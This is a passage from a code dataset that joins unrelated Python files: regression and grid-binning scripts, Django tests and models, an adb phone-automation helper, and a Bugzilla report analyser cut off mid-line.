loss/num_samples\r\n\r\ndef predict(X, W):\r\n A = np.concatenate((np.ones(shape=(X.shape[0], 1)), X), axis=1)\r\n y = np.matmul(A, W)\r\n return y\r\n\r\ndef writer_param(file, W, mean, std):\r\n W = np.reshape(W, (NUM_FEATURES+1, 1))\r\n mean = np.reshape(W, (NUM_FEATURES + 1, 1))\r\n std = np.reshape(W, (NUM_FEATURES + 1, 1))\r\n result = np.concatenate((W, mean, std), axis=1)\r\n with open(file, 'w') as f:\r\n writer = csv.writer(f, delimiter=',', lineterminator='\\n')\r\n writer.writerow(['Weight', 'mean', 'stddev'])\r\n for i in range(NUM_FEATURES+1):\r\n writer.writerow(result[i])\r\n\r\ndef writer_file(file, X, y):\r\n y = np.reshape(y, (len(y), -1))\r\n result = np.concatenate((X, y), axis=1)\r\n with open(file, 'w') as f:\r\n writer = csv.writer(f, delimiter=',', lineterminator='\\n')\r\n for i in range(X.shape[0]):\r\n writer.writerow(result[i])\r\n\r\ndef main(args):\r\n X, y = load_data(args.file_in)\r\n X, mean_X, std_X = normalize_data(X)\r\n #X_train, y_train, X_val, y_val = shuffle_data(X, y, p=0.7, is_shuffle=False)\r\n X_train, y_train, X_val, y_val = split_data(X, y, p=3)\r\n\r\n\r\n X_test_org, _ = load_data(args.file_test, is_train=False)\r\n X_test, _, _ = normalize_data(X_test_org, mean_X, std_X)\r\n #X_test = X_test_org\r\n\r\n ''' -----------tranning-----------'''\r\n best_W = np.zeros((NUM_FEATURES+1, 1))\r\n list_lamb = []\r\n list_val_loss = []\r\n list_train_loss = []\r\n list_test_loss = []\r\n for lamb in np.linspace(0, 15, 10000):\r\n W = calc_weight(X_train, y_train, lamb)\r\n train_loss = calc_loss(X_train, y_train, W)\r\n val_loss = calc_loss(X_val, y_val, W)\r\n list_lamb.append(lamb)\r\n list_train_loss.append(train_loss)\r\n list_val_loss.append(val_loss)\r\n\r\n # test_loss = calc_loss(X_test, z, W)\r\n # list_test_loss.append(test_loss)\r\n\r\n ''''---------Plot------------'''\r\n import matplotlib.pyplot as plt\r\n plt.xlabel('lambda')\r\n plt.ylabel('loss')\r\n plt.plot(list_lamb, list_val_loss, 'r-',\r\n list_lamb, list_train_loss, 'b-')\r\n #list_lamb, list_test_loss, 'g-')\r\n plt.show()\r\n\r\n\r\n '''---------Predict--------'''\r\n W = calc_weight(X_train, y_train, lamb=10)\r\n val_loss = calc_loss(X_val, y_val, W)\r\n y_test = predict(X_test, W)\r\n test_loss = calc_loss(X_test, z, W)\r\n train_loss = calc_loss(X_train, y_train, W)\r\n print('Train loss: %.4f' % train_loss)\r\n print('Validition loss: %.4f' % val_loss)\r\n #print('Test loss: %.4f' % test_loss)\r\n\r\n '''---Writing file and param---'''\r\n writer_param(args.file_param, W, mean_X, std_X)\r\n writer_file(args.file_out, X_test_org, y_test)\r\n y_test = np.reshape(y_test, (len(y_test), -1))\r\n result = np.concatenate((X_test_org, y_test), axis=1)\r\n print('----Weight-----')\r\n print(result)\r\n\r\ndef parser_argument(argv):\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--file_in', type=str,\r\n help='file input', default='../input/1-prostate-training-data.csv')\r\n parser.add_argument('--file_test', type=str,\r\n help='file test', default='../input/20141773-test.csv')\r\n parser.add_argument('--file_param', type=str,\r\n help='file param', default='../output/param.csv')\r\n parser.add_argument('--file_out', type=str,\r\n help='file output', default='../output/20141773.csv')\r\n return parser.parse_args(argv)\r\n\r\nif __name__ == '__main__':\r\n main(parser_argument(sys.argv[1:]))","sub_path":"data/final_responses/IT4866_20141773/IT4866_20141773/BT1_prostate_ridge_regression.py","file_name":"BT1_prostate_ridge_regression.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412737120","text":"import numpy as np\nfrom class_def import *\nfrom math import ceil, floor, sqrt, cos, asin\nimport time\n\n\ndef loadData(nrRows):\n ''' Loads data from carMirrorData.dat\n :return: nrVectors x 6 np array\n '''\n # load the data\n t1 = time.time()\n data = np.loadtxt(\"carMirrorData.dat\",max_rows = nrRows)\n t2 = time.time()\n print(\"Loading done in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return data\n\ndef determineMaxMin(data):\n '''Determines the mininum and maximum value for every dimension\n :return: xMin, xMax, yMin, yMax, zMin, zMax\n '''\n\n t1 = time.time()\n\n # determine min and max\n xMin = np.amin(data[:, 0])\n xMax = np.amax(data[:, 0])\n yMin = np.amin(data[:, 1])\n yMax = np.amax(data[:, 1])\n zMin = np.amin(data[:, 2])\n zMax = np.amax(data[:, 2])\n\n # report to user\n t2 = time.time()\n print(\"Max and min found in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return xMin, xMax, yMin, yMax, zMin, zMax\n\ndef createVectorObjects(data):\n ''' Creates objects from the particle/vector data\n :param data: raw data in numpy array\n :return: 1D numpy array with vectors as vector objects\n '''\n\n t1 = time.time()\n\n # create empty numpy array\n dataPoints = np.empty(np.size(data, axis=0), dtype=object)\n\n # loop over data and create vector object for each particle row\n for i in range(np.size(data, axis=0)):\n dataPoints[i] = vector(data[i, :])\n\n # report to user\n t2 = time.time()\n print(\"Objects created in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return dataPoints\n\ndef createGridPitchAndRadius(pitch, radius, xMin, xMax, yMin, yMax, zMin, zMax):\n\n t1 = time.time()\n\n # calculate amount of bins in every direction\n nrBinsX = floor((xMax - xMin) / pitch) + 2\n nrBinsY = floor((yMax - yMin) / pitch) + 2\n nrBinsZ = floor((zMax - zMin) / pitch) + 2\n\n\n # create empty 3D array\n grid = np.empty((nrBinsX, nrBinsY, nrBinsZ), dtype=object)\n\n # set radius of bins and\n gridBin.radius = radius\n gridBin.nrBinsX = nrBinsX\n gridBin.nrBinsY = nrBinsY\n gridBin.nrBinsZ = nrBinsZ\n\n # define x, y and z coordinates of center bin\n x = np.array([(xMin + i * pitch) for i in range(nrBinsX)])\n y = np.array([(yMin + i * pitch) for i in range(nrBinsY)])\n z = np.array([(zMin + i * pitch) for i in range(nrBinsZ)])\n\n # fill matrix with bin objects by looping over matrix\n for i in range(nrBinsX):\n for j in range(nrBinsY):\n for k in range(nrBinsZ):\n grid[i, j, k] = gridBin(x[i], y[j], z[k])\n\n # report to user\n t2 = time.time()\n print('Grid created in ', \"{:.2f}\".format(t2 - t1), \" s\")\n\n # report amount of bins to user\n xAmount = np.size(grid, axis=0)\n yAmount = np.size(grid, axis=1)\n zAmount = np.size(grid, axis=2)\n print(\"Amount of bins in x direction: \", xAmount)\n print(\"Amount of bins in y direction: \", yAmount)\n print(\"Amount of bins in z direction: \", zAmount)\n print(\"Total amount of bins: \", xAmount * yAmount * zAmount)\n\n return grid\n\ndef assignVectorsToGrid(vectors, grid, pitch, radius,\n xMin, yMin, zMin):\n\n t1 = time.time()\n\n # loop though all the vectors\n for vector in vectors:\n\n # get coordinates\n x = vector.x\n y = vector.y\n z = vector.z\n\n # calculate indices in every direction\n indexXLow = int(ceil((x-radius-xMin) / pitch))\n indexXHigh = int(floor((x + radius - xMin) / pitch))\n indexYLow = int(ceil((y - radius - yMin) / pitch))\n indexYHigh = int(floor((y + radius - yMin) / pitch))\n indexZLow = int(ceil((z - radius - zMin) / pitch))\n indexZHigh = int(floor((z + radius - zMin) / pitch))\n\n # create range of indices in every direction\n xRange = range(indexXLow,indexXHigh + 1)\n yRange = range(indexYLow,indexYHigh + 1)\n zRange = range(indexZLow,indexZHigh + 1)\n\n # loop through all relevant bins\n for i in xRange:\n for j in yRange:\n for k in zRange:\n\n # get bin object\n aBin = grid[i][j][k]\n\n # get coordinates\n xx = aBin.x\n yy = aBin.y\n zz = aBin.z\n\n if sqrt((xx-x)**2 + (yy-y)**2 + (zz-z)**2) <= radius:\n\n aBin.addVector(vector)\n\n # report to user\n t2 = time.time()\n print(\"Assigning of vectors to bins completed in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return grid\n\ndef checkRadiusLargeEnough(pitch,radius):\n\n # calculate radius in between centers\n R = radius * cos(asin(pitch / (2 * radius)))\n\n # positive if radius is big enough\n if R >= sqrt(2)/2*pitch:\n return True\n else:\n return False\n\n\n#-------------------------------MAIN--------------------------------#\n\n\n\ndef getSphericalGridWithVectorsFast(pitch,radius,nrRows):\n '''\n\n :param pitch: pitch between centers of bins in mm\n :param radius: radius of bins in mm\n :param nrRows: amount of rows to load from the datafile\n enter None when all have to be loaded\n :return: grid with bins and assigned objects\n '''\n\n t1 = time.time()\n\n # check if radius is big enough\n cont = checkRadiusLargeEnough(pitch,radius)\n\n # only perform creation of grid when every particle is covered\n if cont:\n\n # load the data\n data = loadData(nrRows)\n\n # determine max and min of data in every dimension\n minMax = determineMaxMin(data)\n\n # set parameters for bins\n xMin = minMax[0]\n xMax = minMax[1]\n yMin = minMax[2]\n yMax = minMax[3]\n zMin = minMax[4]\n zMax = minMax[5]\n\n # transform raw data into vector objects\n dataPoints = createVectorObjects(data)\n\n # create bins in grid\n grid = createGridPitchAndRadius(pitch,radius,xMin,xMax,yMin,yMax,zMin,zMax)\n\n # assign vector objects to correct bins\n # grid is the 3D array filled with gridBin objects containing\n # the correct vector objects\n grid = assignVectorsToGrid(dataPoints,grid,pitch,radius,xMin,yMin,zMin)\n\n # report to user\n t2 = time.time()\n print(\"Total time: \",\"{:.2f}\".format(t2-t1),\" s\")\n\n return grid\n\n else:\n print(\"WARNING: Set a bigger radius\")\n\ndef loadParticles(nrRows):\n # load data\n data = loadData(nrRows)\n\n # transform raw data into vector objects\n dataPoints = createVectorObjects(data)\n\n # determine min and max\n minMax = determineMaxMin(data)\n\n return dataPoints, minMax\n\ndef allgrid(pitches,radii,nrParticles):\n t1 = time.time()\n\n contall = []\n for i in range(len(pitches)):\n contall.append(checkRadiusLargeEnough(pitches[i], radii[i]))\n\n all(contall)\n if all(contall):\n\n # load in data\n dataPoints, minMax = loadParticles(nrParticles)\n\n # set parameters for bins\n xMin = minMax[0]\n xMax = minMax[1]\n yMin = minMax[2]\n yMax = minMax[3]\n zMin = minMax[4]\n zMax = minMax[5]\n\n grids = []\n # create different grids\n for i in range(len(pitches)):\n\n print()\n print(\"---------------\")\n print(\"Grid \", i+1,)\n\n\n # create the grid with certain pitch and radius\n grid = createGridPitchAndRadius(pitches[i], radii[i], xMin, xMax, yMin, yMax, zMin, zMax)\n\n # assign vector objects to correct bins\n # grid is the 3D array filled with gridBin objects containing\n # the correct vector objects\n grid = assignVectorsToGrid(dataPoints, grid, pitches[i], radii[i], xMin, yMin, zMin)\n\n grids.append(grid)\n\n # report to user\n t2 = time.time()\n print(\"---------------\")\n print()\n print(\"Total time: \", \"{:.2f}\".format(t2 - t1), \" s\")\n print()\n print(\"----------------------------------------\")\n\n return grids\n\n else:\n print(\"WARNING: Set a bigger radius\")","sub_path":"Dana2/gridConstructionSphereFast.py","file_name":"gridConstructionSphereFast.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"481445410","text":"from unittest import TestCase\nfrom datawinners.accountmanagement.models import TEST_REPORTER_MOBILE_NUMBER\nfrom mangrove.bootstrap import initializer\nfrom mangrove.datastore.database import _delete_db_and_remove_db_manager, get_db_manager\nfrom mangrove.datastore.entity import get_by_short_code_include_voided\nfrom mangrove.form_model.form_model import MOBILE_NUMBER_FIELD, NAME_FIELD\nfrom mangrove.transport import TransportInfo\nfrom mangrove.transport.contract.survey_response import SurveyResponse\nfrom mangrove.transport.repository.reporters import REPORTER_ENTITY_TYPE\nfrom datawinners.project.data_sender_helper import get_data_sender\nfrom datawinners.tests.test_data_utils import register, create_data_dict\n\n\nclass TestDataSenderHelper(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.manager = get_db_manager('http://localhost:5984/', 'mangrove-test')\n _delete_db_and_remove_db_manager(cls.manager)\n cls.manager = get_db_manager('http://localhost:5984/', 'mangrove-test')\n initializer._create_views(cls.manager)\n\n cls.org_id = 'SLX364903'\n cls._prepare_sms_data_senders()\n cls.test_ds_id = get_by_short_code_include_voided(cls.manager, \"test\", REPORTER_ENTITY_TYPE).id\n deleted_ds = get_by_short_code_include_voided(cls.manager, \"del1\", REPORTER_ENTITY_TYPE)\n deleted_ds.void()\n cls.deleted_ds_id = deleted_ds.id\n\n def test_should_return_data_sender_information_send_from_web(self):\n beany_tester_id = get_by_short_code_include_voided(TestDataSenderHelper.manager, \"rep1\",\n REPORTER_ENTITY_TYPE).id\n survey_response = SurveyResponse(TestDataSenderHelper.manager,\n TransportInfo(\"web\", \"tester150411@gmail.com\", \"destination\"),\n owner_uid=beany_tester_id)\n data_sender = get_data_sender(TestDataSenderHelper.manager, survey_response)\n self.assertEqual((\"Beany\", \"rep1\", data_sender[2]), data_sender)\n\n\n def test_should_return_N_A_when_the_data_sender_was_deleted_and_send_from_smart_phone(self):\n survey_response = SurveyResponse(TestDataSenderHelper.manager,\n TransportInfo(\"smartPhone\", \"nobody@gmail.com\", \"destination\"),\n owner_uid=self.deleted_ds_id)\n data_sender = get_data_sender(TestDataSenderHelper.manager, survey_response)\n\n self.assertEqual((\"M K Gandhi\", u\"del1\"), data_sender[:2])\n\n def test_should_return_data_sender_TESTER_when_send_from_TEST_REPORTER_MOBILE_NUMBER(self):\n survey_response = SurveyResponse(TestDataSenderHelper.manager,\n TransportInfo(\"sms\", TEST_REPORTER_MOBILE_NUMBER, \"destination\"),\n owner_uid=self.test_ds_id)\n data_sender = get_data_sender(TestDataSenderHelper.manager, survey_response)\n\n self.assertEqual(('TEST', 'test', data_sender[2]), data_sender)\n\n @classmethod\n def _prepare_sms_data_senders(cls):\n phone_number_type = create_data_dict(TestDataSenderHelper.manager, name='Telephone Number',\n slug='telephone_number', primitive_type='string')\n first_name_type = create_data_dict(TestDataSenderHelper.manager, name='First Name', slug='first_name',\n primitive_type='string')\n\n coordinates = {\"type\": \"Point\", \"coordinates\": [-21.0399440737, 45.2363669927]}\n location = [u'Madagascar', u'Menabe', u'Mahabo', u'Beronono']\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, TEST_REPORTER_MOBILE_NUMBER, phone_number_type),\n (NAME_FIELD, \"TEST\", first_name_type)], location=location, short_code=\"test\", geometry=coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"1234567890\", phone_number_type), (NAME_FIELD, \"Beany\", first_name_type)],\n location, \"rep1\", coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"261332592634\", phone_number_type), (NAME_FIELD, \"Qingshan\", first_name_type)],\n location=location, short_code=\"rep2\", geometry=coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"4008123123\", phone_number_type), (NAME_FIELD, \"KFC\", first_name_type)],\n location=location, short_code=\"rep4\", geometry=coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"4008123123\", phone_number_type), (NAME_FIELD, \"M K Gandhi\", first_name_type)],\n location=location, short_code=\"del1\", geometry=coordinates)\n\n\ndef register_datasender(manager):\n phone_number_type = create_data_dict(manager, name='Telephone Number', slug='telephone_number',\n primitive_type='string')\n first_name_type = create_data_dict(manager, name='First Name', slug='first_name', primitive_type='string')\n coordinates = {\"type\": \"Point\", \"coordinates\": [-21.0399440737, 45.2363669927]}\n location = [u'Madagascar', u'Menabe', u'Mahabo', u'Beronono']\n register(manager, REPORTER_ENTITY_TYPE, [(MOBILE_NUMBER_FIELD, \"1234567890\", phone_number_type),\n (NAME_FIELD, \"Tester 150411\", first_name_type)], location, \"rep276\",\n coordinates)\n return get_by_short_code_include_voided(manager, \"rep276\", REPORTER_ENTITY_TYPE).id\n","sub_path":"datawinners/project/tests/test_data_sender_helper.py","file_name":"test_data_sender_helper.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557440520","text":"import models.crud as crud\nfrom models.monkey import Monkey\nfrom models.timeframe import Timeframe\n\n\nclass Assignment(object):\n\n # flds = [\n # 'id', 'employee_id', 'project_id',\n # 'first_month', 'last_month', 'effort', 'notes',\n # ]\n\n def __init__(self, lst):\n self.id = lst[0]\n self.employee_id = lst[1]\n self.project_id = lst[2]\n self.first_month = Monkey(lst[3])\n self.last_month = Monkey(lst[4])\n self.timeframe = Timeframe(self.first_month,self.last_month)\n self.effort = lst[5]\n # self.notes = lst[6]\n self.employee = lst[7] if len(lst) > 7 else None\n self.project = lst[8] if len(lst) > 8 else None\n self.tbl = 'Assignments'\n\n @staticmethod\n def get_all():\n sql = (\"SELECT a.*, e.name AS employee, p.nickname AS project \"\n \"FROM Assignments AS a \"\n \"JOIN Projects AS p ON a.project_id=p.id \"\n \"JOIN Employees AS e ON a.employee_id=e.id\")\n cursor = crud.the_dataset.cxn.cursor()\n cursor.execute(sql)\n rows = cursor.fetchall()\n keys = [row[0] for row in rows]\n rex = {key: prj for (key, prj) in zip(keys, rows)}\n return {asnid: Assignment(asn) for (asnid, asn) in zip(rex.keys(), rex.values())}\n\n @staticmethod\n def get_all_for_prj(prjid):\n sql = (\"SELECT a.*, e.name AS employee, p.nickname AS project \"\n \"FROM Assignments AS a \"\n \"JOIN Projects AS p ON a.project_id=p.id \"\n \"JOIN Employees AS e ON a.employee_id=e.id \"\n \"WHERE a.project_id=:project_id\")\n cursor = crud.the_dataset.cxn.cursor()\n cursor.execute(sql, {'project_id': prjid})\n rows = cursor.fetchall()\n keys = [row[0] for row in rows]\n rex = {key: prj for (key, prj) in zip(keys, rows)}\n return {asnid: Assignment(asn) for (asnid, asn) in zip(rex.keys(), rex.values())}\n\n @staticmethod\n def get_all_for_emp(empid):\n sql = (\"SELECT a.*, e.name AS employee, p.nickname AS project \"\n \"FROM Assignments AS a \"\n \"JOIN Projects AS p ON a.project_id=p.id \"\n \"JOIN Employees AS e ON a.employee_id=e.id \"\n \"WHERE a.employee_id=:employee_id\" )\n cursor = crud.the_dataset.cxn.cursor()\n cursor.execute(sql, {'employee_id': empid})\n rows = cursor.fetchall()\n keys = [row[0] for row in rows]\n rex = {key: emp for (key, emp) in zip(keys, rows)}\n return {asnid: Assignment(asn) for (asnid, asn) in zip(rex.keys(), rex.values())}\n\n def save(self):\n if self.id:\n crud.DataSet.update(self)\n else:\n crud.DataSet.insert(self)\n\n def remove(self):\n crud.DataSet.remove(self)\n\n @staticmethod\n def by_project(asn):\n return asn.project\n\n @staticmethod\n def by_employee(asn):\n return asn.employee\n\n @staticmethod\n def filter_by_project(asns, prjid):\n return [asn for asn in asns.values() if asn.project_id == prjid]\n\n @staticmethod\n def filter_by_employee(asns, empid):\n return [asn for asn in asns.values() if asn.employee_id == empid]\n","sub_path":"models/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"400040992","text":"\"\"\"By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13,\nwe can see that the 6th prime is 13.\n\nWhat is the 10 001st prime number?\"\"\"\nfrom itertools import islice\n\n\ndef main():\n print(solve(10001))\n\n\ndef solve(number):\n primes = gen_primes()\n return list(islice(primes, number - 1, number))[0]\n\n\ndef gen_primes():\n p = 2\n yield p\n primes = [p]\n while True:\n p += 1\n if 0 not in [p % x for x in primes]:\n primes.append(p)\n yield p\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"374986059","text":"import sys\nfrom dev.launchmodes import QuietPortableLauncher\n\nnum_clients = 8\n\n\ndef start(cmd_line):\n QuietPortableLauncher(cmd_line, cmd_line)()\n\n\nstart(\"echo-server.py\")\n\nargs = ' '.join(sys.argv[1:])\n\nfor i in range(num_clients):\n start(\"echo-client.py {}\".format(args))\n","sub_path":"dev/Internet/Sockets/testecho.py","file_name":"testecho.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"630044609","text":"# -*-coding:utf-8-*-\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport subprocess\r\nimport re\r\nimport sys\r\nimport wmi\r\nimport hashlib\r\nimport shutil\r\nfrom abc import abstractmethod\r\n\r\n\r\nclass androidDevice():\r\n def __init__(self, device=None):\r\n \"\"\"\r\n :param phone:adb 操作手机所需要的端口信息\r\n \"\"\"\r\n self.device = device\r\n if self.device is None:\r\n self.device = androidDevice.conn_device()[0]\r\n self.config = self.config_device()\r\n\r\n # 截屏上传\r\n def pull_screenshot(self):\r\n os.system('adb -s {0} shell screencap -p /sdcard/autojump.png'.format(self.device)) # 发送 截屏命令 到手机\r\n os.system('adb -s {0} pull /sdcard/autojump.png ./autojump-{1}.png'.format(self.device, self.device)) # 发送 拉取图片到电脑 命令\r\n\r\n # 点击\r\n def tap(self, x, y):\r\n cmd = r'adb -s {0} shell input tap {1} {2}'.format(self.device, x, y)\r\n pi = os.popen(cmd)\r\n res = pi.read()\r\n # print(res)\r\n\r\n # 滑动\r\n def swipe(self, start, end):\r\n cmd = r'adb -s {0} shell input swipe {1} {2} {3} {4}'.format(self.device, int(start[0]), int(start[1]), int(end[0]),\r\n int(end[1]))\r\n pi = os.popen(cmd)\r\n res = pi.read()\r\n # print(res)\r\n\r\n # pyplot事件响应\r\n @staticmethod\r\n def onClick(event, config, page): # 定义 鼠标点击 处理函数\r\n ix, iy = event.xdata, event.ydata\r\n now = (ix, iy)\r\n print('now click:', now)\r\n sys.stdout.flush()\r\n\r\n for key, value in config[page].items():\r\n if value is None:\r\n print('刚才点的是:', key)\r\n config[page][key] = now\r\n break\r\n\r\n if None not in config[page].values():\r\n plt.close() # 关闭传入的 figure 对象\r\n\r\n # 算号\r\n @staticmethod\r\n def get_disk_Serial():\r\n c = wmi.WMI()\r\n disks = []\r\n for disk in c.Win32_DiskDrive():\r\n disks.append(disk.SerialNumber.strip())\r\n return disks\r\n\r\n # 连接设备\r\n @staticmethod\r\n def conn_device():\r\n serial = input(\"input 本机注册码:\").strip()\r\n disks=androidDevice.get_disk_Serial()\r\n flag=0\r\n for disk in disks:\r\n h1=hashlib.md5()\r\n h1.update(bytes(disk+'migu',encoding='utf-8'))\r\n if h1.hexdigest()[0:16]== serial:\r\n flag=1\r\n break\r\n # if flag==0:\r\n # sys.exit(\"\\n\\n注册码错误!\")\r\n\r\n adb_path = 'C:\\\\Windows\\\\'\r\n adb_files = ['adb.exe', 'AdbWinApi.dll', 'AdbWinUsbApi.dll']\r\n for file in adb_files:\r\n if not os.path.exists(adb_path + file):\r\n shutil.copyfile('.\\\\adb\\\\' + file, adb_path + file)\r\n\r\n cmd = r'adb devices'\r\n pi = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\r\n res = str(pi.stdout.read(), encoding='utf-8')\r\n # pi = os.popen(cmd)\r\n # res = pi.read()\r\n print(res)\r\n device_list = re.findall(r'^[A-Z0-9]+\\b', res, re.M)\r\n return device_list\r\n\r\n @staticmethod\r\n def conn_device():\r\n adb_path = 'C:\\\\Windows\\\\'\r\n adb_files = ['adb.exe', 'AdbWinApi.dll', 'AdbWinUsbApi.dll']\r\n for file in adb_files:\r\n if not os.path.exists(adb_path + file):\r\n shutil.copyfile('.\\\\adb\\\\' + file, adb_path + file)\r\n\r\n cmd = r'adb devices'\r\n pi = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\r\n res = str(pi.stdout.read(), encoding='utf-8')\r\n print(res)\r\n device_list = re.findall(r'^[A-Z0-9]+\\b', res, re.M)\r\n return device_list\r\n\r\n # 按钮配置\r\n @abstractmethod\r\n def config_device(self):\r\n pass\r\n\r\n # xxqg自动\r\n @abstractmethod\r\n def play_device(self):\r\n pass","sub_path":"androidDevice.py","file_name":"androidDevice.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"159307223","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata=pd.DataFrame(np.random.randn(10000,4),\n\n columns=list(\"abcd\")\n )\nprint(data.head())\ndata=data.cumsum()\ndata.plot()\nplt.show()\n\n","sub_path":"untitled2/test_plot.py","file_name":"test_plot.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"626062701","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articles', '0002_entry_comment_count'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='entry',\n name='categories',\n ),\n migrations.AddField(\n model_name='entry',\n name='categories',\n field=models.ForeignKey(related_name='entries', default=1, to='articles.Category'),\n preserve_default=False,\n ),\n ]\n","sub_path":"articles/migrations/0003_auto_20150917_1256.py","file_name":"0003_auto_20150917_1256.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"77003542","text":"#!/usr/bin/env python3\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n#\n\nimport common\nimport datetime\n\nreportPeriodDays = 7\n\ndef util_create_statList_weeklyReport():\n return {\n 'created': {'id': [], 'author': []},\n 'still_unconfirmed': [],\n 'unconfirmed': [],\n 'newUsers': {},\n 'comments_count': {},\n 'status_changed': {},\n 'keyword_added': {k: {'id':[], 'author': []} for k in common.keywords_list},\n 'keyword_removed': {k: {'id':[], 'author': []} for k in common.keywords_list},\n 'whiteboard_added': {},\n 'whiteboard_removed': {},\n 'severity_changed': {s: {'id':[], 'author': []} for s in common.severities_list},\n 'priority_changed': {p: {'id':[], 'author': []} for p in common.priorities_list},\n 'system_changed': {p: {'id':[], 'author': []} for p in common.system_list},\n 'metabug_added': {},\n 'metabug_removed': {},\n 'people': {},\n 'metabugAlias': {},\n 'stat': {'oldest': datetime.datetime.now(), 'newest': datetime.datetime(2001, 1, 1)}\n }\n\ndef analyze_bugzilla_weeklyReport(statList, bugzillaData, cfg):\n print(\"Analyzing Bugzilla\\n\", end=\"\", flush=True)\n statNewDate = statList['stat']['newest']\n statOldDate = statList['stat']['oldest']\n\n for key, row in bugzillaData['bugs'].items():\n rowId = row['id']\n\n #Ignore META bugs and deletionrequest bugs.\n if not row['summary'].lower().startswith('[meta]') and row['component'].lower() != 'deletionrequest':\n creationDate = datetime.datetime.strptime(row['creation_time'], \"%Y-%m-%dT%H:%M:%SZ\")\n if creationDate < statOldDate:\n statOldDate = creationDate\n if creationDate > statNewDate:\n statNewDate = creationDate\n\n rowStatus = row['status']\n\n if rowStatus == 'UNCONFIRMED':\n statList['unconfirmed'].append(rowId)\n\n creatorMail = row['creator']\n\n common.util_check_bugzilla_mail(statList, creatorMail, row['creator_detail']['real_name'], creationDate, rowId)\n\n if creationDate >= cfg['reportPeriod']:\n statList['created']['id'].append(rowId)\n statList['created']['author'].append(creatorMail)\n if rowStatus == 'UNCONFIRMED':\n statList['still_unconfirmed'].append(rowId)\n\n rowKeywords = row['keywords']\n\n crashSignature = row['cf_crashreport']\n\n for action in row['history']:\n actionMail = action['who']\n actionDate = datetime.datetime.strptime(action['when'], \"%Y-%m-%dT%H:%M:%SZ\")\n common.util_check_bugzilla_mail(statList, actionMail, '', actionDate, rowId)\n\n # Use these variables in case the status is set before the resolution or viceversa\n newStatus = None\n newResolution = None\n oldStatus = None\n oldResolution = None\n for change in action['changes']:\n if change['field_name'] == 'blocks':\n if change['added']:\n for metabug in change['added'].split(', '):\n\n if actionDate >= cfg['reportPeriod'] and int(metabug) in row['blocks']:\n if metabug not in statList['metabug_added']:\n statList['metabug_added'][metabug] = {'id':[], 'author':[]}\n\n statList['metabug_added'][metabug]['id'].append(rowId)\n statList['metabug_added'][metabug]['author'].append(actionMail)\n\n if change['removed']:\n for metabug in change['removed'].split(', '):\n\n if actionDate >= cfg['reportPeriod'] and int(metabug) not in row['blocks']:\n if metabug not in statList['metabug_removed']:\n statList['metabug_removed'][metabug] = {'id':[], 'author':[]}\n\n statList['metabug_removed'][metabug]['id'].append(rowId)\n statList['metabug_removed'][metabug]['author'].append(actionMail)\n\n if change['field_name'] == 'status':\n addedStatus = change['added']\n removedStatus = change['removed']\n\n if removedStatus == 'RESOLVED' or removedStatus == 'VERIFIED':\n if oldResolution:\n removedStatus = removedStatus + \"_\" + oldResolution\n oldResolution = None\n else:\n oldStatus = removedStatus\n\n if addedStatus == 'RESOLVED' or addedStatus == 'VERIFIED':\n if newResolution:\n addedStatus = addedStatus + \"_\" + newResolution\n if actionDate >= cfg['reportPeriod']:\n keyValue = removedStatus + '-' + addedStatus\n if keyValue not in statList['status_changed']:\n statList['status_changed'][keyValue] = {'id':[], 'author':[]}\n statList['status_changed'][keyValue]['id'].append(rowId)\n statList['status_changed'][keyValue]['author'].append(actionMail)\n\n newResolution = None\n else:\n newStatus = addedStatus\n else:\n if removedStatus == 'RESOLVED' or removedStatus == 'VERIFIED':\n newStatus = addedStatus\n else:\n if actionDate >= cfg['reportPeriod']:\n keyValue = removedStatus + '-' 